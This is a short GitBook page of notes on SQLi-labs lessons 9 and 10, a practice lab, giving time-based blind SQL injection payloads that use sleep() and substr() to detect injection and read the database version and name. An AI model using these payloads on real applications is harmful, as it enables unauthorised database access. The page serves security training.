Powered by GitBook

SQLi-labs: Lesson-9

Time-based SQLi.

Basic query to detect sqli

?id=1' and sleep(10)--+
Get version

?id=1' and if(substr(version(),1,1)=5, sleep(10),null)--+
Get database

?id=1' and if(substr(database(),1,1)='s', sleep(10),null)--+
Using the similar way to get table name and column names.

SQLi-labs: Lesson-10

Time-based SQLi.

Similar to Lesson-9, but use double quote instead of single quote.

?id=1" and sleep(10)--+

?id=1" and if(substr(version(),1,1)=5, sleep(10),null)--+

?id=1" and if(substr(database(),1,1)='s', sleep(10),null)--+

results matching ""

No results matching ""